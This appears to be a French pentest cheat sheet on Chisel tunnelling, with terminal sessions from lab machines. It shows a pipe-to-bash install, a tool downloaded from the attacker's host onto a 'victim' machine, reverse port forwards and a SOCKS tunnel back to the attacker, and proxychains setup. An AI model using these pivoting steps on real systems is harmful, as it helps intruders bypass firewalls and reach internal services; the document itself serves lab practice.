Chisel¶
Chisel est un outil pour créer des tunnels. Ce dernier permet d’éviter les firewalls en de se positionner à l’intérieur de l’infrastucture. Il peut être très intéressant quand on a des services qui sont inaccessible depuis internet mais accessible en interne.
Installation « classique »¶
curl https://i.jpillora.com/chisel! | bash
mv with sudo...
[sudo] password for kali:
Installed at /usr/local/bin/chisel
Usage¶
Cote Kali/Server¶
Pour utiliser chisel, il est nécessaire que ce dernier soit présent des deux côtés (serveur + client).
┌──(kali㉿kali)-[~]
└─$ cd /usr/local/bin/
┌──(kali㉿kali)-[/usr/local/bin]
└─$ ls
bloodhound-python chisel zpng zsteg zsteg-mask zsteg-reflow
┌──(kali㉿kali)-[/usr/local/bin]
└─$ python3 -m http.server &
[1] 33745
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌──(kali㉿kali)-[/usr/local/bin]
└─$ chisel server -p 3322 --reverse
2022/11/27 13:31:30 server: Reverse tunnelling enabled
2022/11/27 13:31:30 server: Fingerprint D7g8596J47J89AM89pF5oHAMgoyn+0x869NIO3n9yho=
2022/11/27 13:31:30 server: Listening on http://0.0.0.0:3322
Cote victime/client¶
On récupère chisel depuis le serveur distant
lp@antique:~$ wget http://10.10.14.2:8000/chisel
lp@antique:~$ chmod +x ./chisel
lp@antique:~$ ./chisel client 10.10.14.2:3322 R:631:127.0.0.1:27017 #Si tu la connais pas, tu la trouve pas elle hein ?
R:631:127.0.0.1:27017/tcp: the R means we want to perform a reverse port forward; 631 is the port number we want to use to route traffic through on the attacker’s machine; 127.0.0.1:27017 is the IP address/port we want to route our traffic to on the client’s machine; /tcp means we want to use the TCP protocol.
Chisel with Proxychain¶
┌──(kali㉿LuKaLi)-[~/Tools]
└─$ ./chisel server -p 3322 --reverse --socks5
2023/03/21 16:05:24 server: Reverse tunnelling enabled
2023/03/21 16:05:24 server: Fingerprint +KU/UudslMYpXHvUkwfJnve4d9NU/BnsI7PRM9gsyrA=
2023/03/21 16:05:24 server: Listening on http://0.0.0.0:3322
root@icinga:~#>/tmp/chisel client 10.10.15.186:3322 R:5000:socks
┌──(kali㉿kali)-[~/machines/Bizness]
└─$ cat /etc/proxychains4.conf| head -n -2 | sudo tee /etc/proxychains4.conf && echo -e "socks5 127.0.0.1 5000\n" | sudo tee -a /etc/proxychains4.conf